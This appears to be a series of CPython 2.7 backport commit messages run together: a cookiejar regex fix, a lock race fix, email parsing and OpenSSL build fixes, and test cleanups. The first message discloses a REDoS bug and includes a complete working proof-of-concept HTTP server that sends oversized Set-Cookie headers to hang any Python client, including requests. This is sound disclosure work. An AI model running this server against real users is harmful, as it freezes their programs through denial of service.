The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
from http.server import BaseHTTPRequestHandler, HTTPServer
def make_set_cookie_value(n_spaces):
spaces = " " * n_spaces
expiry = f"1-c-1{spaces}!"
return f"b;Expires={expiry}"
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
self.log_request(204)
self.send_response_only(204) # Don't bother sending Server and Date
n_spaces = (
int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences
if len(self.path) > 1 else
65506 # Max header line length 65536
)
value = make_set_cookie_value(n_spaces)
for i in range(99): # Not necessary, but we can have up to 100 header lines
self.send_header("Set-Cookie", value)
self.end_headers()
if __name__ == "__main__":
HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bfb85)
Backporting this change, I observe a couple of things:
1. The _encode_request call is no longer meaningful because the request construction will implicitly encode the request using the default encoding when the format string is used (request = '%s %s %s'...). In order to keep the code as consistent as possible, I decided to include the call as a pass-through. I'd be just as happy to remove it entirely, but I'll leave that up to the reviewer to decide. It's okay that this functionality is disabled on Python 2 because this functionality was mainly around bpo-36274, which was mainly a concern with the transition to Python 3.
2. Because _encode_request is no longer meaningful, neither is the test for it, so I've removed that test. Therefore, the meaningful part of this test is that for bpo-38216, adding a (underscore-protected) hook to customize/disable validation.
(cherry picked from commit 7774d7831e)
Co-authored-by: Jason R. Coombs <jaraco@jaraco.com>
Fix race in PyThread_release_lock that was leading to memory corruption and
deadlocks. The fix applies to POSIX systems where Python locks are implemented
with mutex and condition variable because POSIX semaphores are either not
provided, or are known to be broken. One particular example of such system is
macOS.
On Darwin, even though this is considered as POSIX, Python uses
mutex+condition variable to implement its lock, and, as of 2019-08-28, Py2.7
implementation, even though similar issue was fixed for Py3 in 2012, contains
synchronization bug: the condition is signalled after mutex unlock while the
correct protocol is to signal condition from under mutex:
https://github.com/python/cpython/blob/v2.7.16-127-g0229b56d8c0/Python/thread_pthread.h#L486-L506https://github.com/python/cpython/commit/187aa545165d (py3 fix)
PyPy has the same bug for both pypy2 and pypy3:
https://bitbucket.org/pypy/pypy/src/578667b3fef9/rpython/translator/c/src/thread_pthread.c#lines-443:465https://bitbucket.org/pypy/pypy/src/5b42890d48c3/rpython/translator/c/src/thread_pthread.c#lines-443:465
Signalling condition outside of corresponding mutex is considered OK by
POSIX, but in Python context it can lead to at least memory corruption if we
consider the whole lifetime of python level lock. For example the following
logical scenario:
T1 T2
sema = Lock()
sema.acquire()
sema.release()
sema.acquire()
free(sema)
...
can translate to the next C-level calls:
T1 T2
# sema = Lock()
sema = malloc(...)
sema.locked = 0
pthread_mutex_init(&sema.mut)
pthread_cond_init (&sema.lock_released)
# sema.acquire()
pthread_mutex_lock(&sema.mut)
# sees sema.locked == 0
sema.locked = 1
pthread_mutex_unlock(&sema.mut)
# sema.release()
pthread_mutex_lock(&sema.mut)
sema.locked = 0
pthread_mutex_unlock(&sema.mut)
# OS scheduler gets in and relinquishes control from T2
# to another process
...
# second sema.acquire()
pthread_mutex_lock(&sema.mut)
# sees sema.locked == 0
sema.locked = 1
pthread_mutex_unlock(&sema.mut)
# free(sema)
pthread_mutex_destroy(&sema.mut)
pthread_cond_destroy (&sema.lock_released)
free(sema)
# ...
e.g. malloc() which returns memory where sema was
...
# OS scheduler returns control to T2
# sema.release() continues
#
# BUT sema was already freed and writing to anywhere
# inside sema block CORRUPTS MEMORY. In particular if
# _another_ python-level lock was allocated where sema
# block was, writing into the memory can have effect on
# further synchronization correctness and in particular
# lead to deadlock on lock that was next allocated.
pthread_cond_signal(&sema.lock_released)
Note that T2.pthread_cond_signal(&sema.lock_released) CORRUPTS MEMORY as it
is called when sema memory was already freed and is potentially
reallocated for another object.
The fix is to move pthread_cond_signal to be done under corresponding mutex:
# sema.release()
pthread_mutex_lock(&sema.mut)
sema.locked = 0
pthread_cond_signal(&sema.lock_released)
pthread_mutex_unlock(&sema.mut)
To do so this patch cherry-picks thread_pthread.h part of the following 3.2 commit:
commit 187aa54516
Author: Kristján Valur Jónsson <kristjan@ccpgames.com>
Date: Tue Jun 5 22:17:42 2012 +0000
Signal condition variables with the mutex held. Destroy condition variables
before their mutexes.
Python/ceval_gil.h | 9 +++++----
Python/thread_pthread.h | 15 +++++++++------
2 files changed, 14 insertions(+), 10 deletions(-)
(ceval_gil.h is Python3 specific and does not apply to Python2.7)
The bug was there since 1994 - since at least [1]. It was discussed in 2001
with original code author[2], but the code was still considered to be
race-free. In 2010 the place where pthread_cond_signal should be - before or
after pthread_mutex_unlock - was discussed with the rationale to avoid
threads bouncing[3,4,5], and in 2012 pthread_cond_signal was moved to be
called from under mutex, but only for CPython3[6,7].
In 2019 the bug was (re-)discovered while testing Pygolang[8] on macOS with
CPython2 and PyPy2 and PyPy3.
[1] https://github.com/python/cpython/commit/2c8cb9f3d240
[2] https://bugs.python.org/issue433625
[3] https://bugs.python.org/issue8299#msg103224
[4] https://bugs.python.org/issue8410#msg103313
[5] https://bugs.python.org/issue8411#msg113301
[6] https://bugs.python.org/issue15038#msg163187
[7] https://github.com/python/cpython/commit/187aa545165d
[8] https://pypi.org/project/pygolang
(cherry picked from commit 187aa54516)
Co-Authored-By: Kristján Valur Jónsson <kristjan@ccpgames.com>
``OPENSSL_VERSION_1_1`` was never defined in ``_hashopenssl.c``.
https://bugs.python.org/issue33936
(cherry picked from commit 724f1a5723)
Co-authored-by: Christian Heimes <christian@python.org>
This change skips parsing of email addresses where domains include a "@" character, which can be maliciously used since the local part is returned as a complete address.
(cherry picked from commit 8cb65d1381)
Excludes changes to Lib/email/_header_value_parser.py, which did not
exist in 2.7.
Co-authored-by: jpic <jpic@users.noreply.github.com>
https://bugs.python.org/issue34155
Fixes a build error with OpenSSL 1.1.0. There is already code in the
`_ssl.c` that handles all the weird cases of the NPN config macros (with
various OpenSSL & LibreSSL versions).
That code will provide a HAVE_NPN variable, which should be used in the
rest of the code to check whether (or what) to compile regarding NPN.
This change adds HAVE_NPN in the remaining places where it should have been
placed.
Signed-off-by: Alexandru Ardelean <ardeleanalex@gmail.com>
https://bugs.python.org/issue35264
If FormatMessageW() is passed the FORMAT_MESSAGE_FROM_SYSTEM flag
without FORMAT_MESSAGE_IGNORE_INSERTS, it will fail if there are
insert sequences in the message definition.
(cherry picked from commit a656365)
When building 2.7 on macOS without system header files installed in
``/usr/include``, a few extension modules dependent on system-supplied
third-party libraries were not being built, most notably zlib.
This situation arose in the past when building without the Command
Line Tools and the option to install header files in the traditional
system locations (like /usr/include). As of macOS 10.14, the
header files are only available in an SDK so the problem addressed
here affects most 2.7 builds.
Fix test_wsgiref.testEnviron() to no longer depend on the environment
variables (don't fail if "X" variable is set).
testEnviron() now overrides os.environ to get a deterministic
environment. Test full TestHandler.environ content: not only a few
selected variables.
(cherry picked from commit 5150d32792)
Co-authored-by: Victor Stinner <vstinner@redhat.com>
* regrtest: Add --cleanup option to remove "test_python_*" directories
of previous failed test jobs.
* Add "make cleantest" to run "python -m test --cleanup".
(cherry picked from commit 47fbc4e45b)
test_gdb no longer fails if it gets an "unexpected" message on
stderr: it now ignores stderr. The purpose of test_gdb is to test
that python-gdb.py commands work as expected, not to test gdb.
(cherry picked from commit e56a123fd0)
If urlparse.urlsplit() detects an invalid netloc according to NFKC
normalization, the error message type is now str rather than unicode,
and use repr() to format the URL, to prevent <exception str() failed>
when display the error message.
* bpo-12639: msilib.Directory.start_component() fails if *keyfile* is not None (GH-13688)
msilib.Directory.start_component() was passing an extra argument to CAB.gen_id().
(cherry picked from commit c8d5bf6c3f)
Co-authored-by: Zackery Spytz <zspytz@gmail.com>